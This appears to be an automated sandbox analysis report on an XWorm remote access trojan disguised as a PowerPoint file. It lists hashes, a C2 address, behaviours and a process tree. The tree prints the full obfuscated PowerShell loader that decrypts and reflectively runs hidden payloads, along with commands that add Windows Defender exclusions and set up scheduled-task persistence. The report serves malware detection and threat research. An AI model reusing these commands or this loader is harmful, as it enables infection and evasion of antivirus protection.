Analysis

  • max time kernel
    149s
  • max time network
    83s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-07-2024 02:54

General

  • Target

    About_me_Logan.pptx.bat.exe

  • Size

    495KB

  • MD5

    ddd1a363eeb560703c3321de9c99a7da

  • SHA1

    31e70586ce843492c3cf6636388190702ba32792

  • SHA256

    6120dc9c6c98279da2699c07a30bf81badf6e9f256fb0e583d1a12f58a0fee98

  • SHA512

    080844fdc6a3f4a7606547cdf7e571e81848c6d912d3d66cdd25e553a677c44f61c5ac5e7c974ce7e41fdbf8fd27c878145ac32e68615c7b71faf38094e93ec1

  • SSDEEP

    12288:ACQjgAtAHM+vetZxF5EWry8AJGy0UQHPB7bypjAlkD:A5ZWs+OZVEWry8AFQH1bCjAly

Malware Config

Extracted

Family

xworm

C2

outdoor-marriott.gl.at.ply.gg:3441

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    svchost.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\About_me_Logan.pptx.bat.exe
    "C:\Users\Admin\AppData\Local\Temp\About_me_Logan.pptx.bat.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3120
    • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\About_me_Logan.pptx" /ou ""
      2⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2428
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Zoom.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1408
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EFnVncWzJPZ19uu1a/XUS1LDDxJ3Mwkc5UTGyThKgsA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('62BsFR0CuV/uDNNRbFB5oQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jmXfG=New-Object System.IO.MemoryStream(,$param_var); $cYSNK=New-Object System.IO.MemoryStream; $ulfnd=New-Object System.IO.Compression.GZipStream($jmXfG, [IO.Compression.CompressionMode]::Decompress); $ulfnd.CopyTo($cYSNK); $ulfnd.Dispose(); $jmXfG.Dispose(); $cYSNK.Dispose(); $cYSNK.ToArray();}function execute_function($param_var,$param2_var){ $GFXrF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Khfkl=$GFXrF.EntryPoint; $Khfkl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Zoom.bat';$JClCy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\RarSFX0\Zoom.bat').Split([Environment]::NewLine);foreach ($ztSDv in $JClCy) { if ($ztSDv.StartsWith(':: ')) { $aJxQL=$ztSDv.Substring(3); break; }}$payloads_var=[string[]]$aJxQL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1336
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_418_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_418.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1092
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_418.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2240
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_418.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3084
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EFnVncWzJPZ19uu1a/XUS1LDDxJ3Mwkc5UTGyThKgsA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('62BsFR0CuV/uDNNRbFB5oQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jmXfG=New-Object System.IO.MemoryStream(,$param_var); $cYSNK=New-Object System.IO.MemoryStream; $ulfnd=New-Object System.IO.Compression.GZipStream($jmXfG, [IO.Compression.CompressionMode]::Decompress); $ulfnd.CopyTo($cYSNK); $ulfnd.Dispose(); $jmXfG.Dispose(); $cYSNK.Dispose(); $cYSNK.ToArray();}function execute_function($param_var,$param2_var){ $GFXrF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Khfkl=$GFXrF.EntryPoint; $Khfkl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_418.bat';$JClCy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_418.bat').Split([Environment]::NewLine);foreach ($ztSDv in $JClCy) { if ($ztSDv.StartsWith(':: ')) { $aJxQL=$ztSDv.Substring(3); break; }}$payloads_var=[string[]]$aJxQL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops startup file
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3164
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4136
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:3324
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4324
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1804
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"
                7⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4300
  • C:\ProgramData\svchost.exe
    C:\ProgramData\svchost.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:3080

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\svchost.exe

    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    6d42b6da621e8df5674e26b799c8e2aa

    SHA1

    ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

    SHA256

    5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

    SHA512

    53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    10890cda4b6eab618e926c4118ab0647

    SHA1

    1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

    SHA256

    00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

    SHA512

    a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    e58749a7a1826f6ea62df1e2ef63a32b

    SHA1

    c0bca21658b8be4f37b71eec9578bfefa44f862d

    SHA256

    0e1f0e684adb40a5d0668df5fed007c9046137d7ae16a1f2f343b139d5f9bc93

    SHA512

    4cf45b2b11ab31e7f67fff286b29d50ed28cd6043091144c5c0f1348b5f5916ed7479cf985595e6f096b586ab93b4b5dce612f688049b8366a2dd91863e98b70

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    5983838483b5d88f3386aaf3b787bc32

    SHA1

    4bf10dce624c494ce9550937cb17a3999ff6a971

    SHA256

    f59dec320ef712bc579bf7dcd7fa0018ec86fabc41dab16905c3d56926402c38

    SHA512

    3eaa18f94076a71a3e4b03a6f850ce2f741709026eea7ef2564410b67efed0adaf0fdf94b7bbfb4ea66b1be0e0bc6d086d39e2f3c17e59390d7b23e8a3aec97d

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\About_me_Logan.pptx

    Filesize

    35KB

    MD5

    b2f93e40f9140626c53776dcd57790b7

    SHA1

    6ff0007c4f5c0193995f41223e9f71c3e1c72de3

    SHA256

    60c49215a43a9b23907acdcca83e3f401d2a0368ff17376774ca807306d50cc9

    SHA512

    fdccaf00b4e767022bed8e6f43749b2ba390fc9ee36c58632faf31cde5d951d966ff82ced1a86521ffb9a910d73e2e7886a126359fec5980e8d3cc512ef36aa0

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Zoom.bat

    Filesize

    90KB

    MD5

    00b76126bc848be1c4cd9ec8a6002968

    SHA1

    51b87cd6ea279d2df534193fc2f69fd5ad4f2dc9

    SHA256

    a5f07898db387568b8d5c42c0e1986c75165e495e6e8756dd62d95e0dbb60f39

    SHA512

    8c0a7e2be08d421ac5477a13aaedbc90b92597fe0d5de965dab97696e28ccf5f2634c826ea3decbb1d39e123448cf345af747ece359a04a7f0eb50f1122a1d4a

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1qtmzh5z.hhs.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\startup_str_418.vbs

    Filesize

    115B

    MD5

    a5dc9080daa2d962543593577b547917

    SHA1

    5eac5b1a183fbdb17f219949d9d7bb2d2cc68986

    SHA256

    76de33b1fd9f69f2ffa2a7e7b76a71fb9eb0f07497ce56cc2fc989b4da1ddd02

    SHA512

    c4b86c003f7380b3cd9144e2a43c948f4516a33a235a0e1b065a34549e3ba983bca0ae5e3af96f39003e1247964d82ed5bc13f9fa7971a4113ea6595f2d492c1

  • memory/1336-63-0x000001CF7C4C0000-0x000001CF7C4D4000-memory.dmp

    Filesize

    80KB

  • memory/1336-62-0x000001CF7C260000-0x000001CF7C268000-memory.dmp

    Filesize

    32KB

  • memory/1336-61-0x000001CF7C270000-0x000001CF7C292000-memory.dmp

    Filesize

    136KB

  • memory/2428-17-0x00007FF8EA490000-0x00007FF8EA4A0000-memory.dmp

    Filesize

    64KB

  • memory/2428-18-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-21-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-22-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-25-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-26-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-24-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-20-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-23-0x00007FF8EA490000-0x00007FF8EA4A0000-memory.dmp

    Filesize

    64KB

  • memory/2428-39-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-45-0x00007FF8ECDF0000-0x00007FF8ECE00000-memory.dmp

    Filesize

    64KB

  • memory/2428-47-0x00007FF8ECDF0000-0x00007FF8ECE00000-memory.dmp

    Filesize

    64KB

  • memory/2428-46-0x00007FF8ECDF0000-0x00007FF8ECE00000-memory.dmp

    Filesize

    64KB

  • memory/2428-44-0x00007FF8ECDF0000-0x00007FF8ECE00000-memory.dmp

    Filesize

    64KB

  • memory/2428-48-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-19-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-16-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-15-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-14-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-13-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-12-0x00007FF8ECDF0000-0x00007FF8ECE00000-memory.dmp

    Filesize

    64KB

  • memory/2428-11-0x00007FF92CD70000-0x00007FF92CF65000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-7-0x00007FF8ECDF0000-0x00007FF8ECE00000-memory.dmp

    Filesize

    64KB

  • memory/2428-10-0x00007FF8ECDF0000-0x00007FF8ECE00000-memory.dmp

    Filesize

    64KB

  • memory/2428-9-0x00007FF8ECDF0000-0x00007FF8ECE00000-memory.dmp

    Filesize

    64KB

  • memory/2428-8-0x00007FF8ECDF0000-0x00007FF8ECE00000-memory.dmp

    Filesize

    64KB

  • memory/3080-151-0x0000017B7F0E0000-0x0000017B7F124000-memory.dmp

    Filesize

    272KB

  • memory/3080-152-0x0000017B7F400000-0x0000017B7F476000-memory.dmp

    Filesize

    472KB

  • memory/3164-92-0x00000299B8F70000-0x00000299B8F88000-memory.dmp

    Filesize

    96KB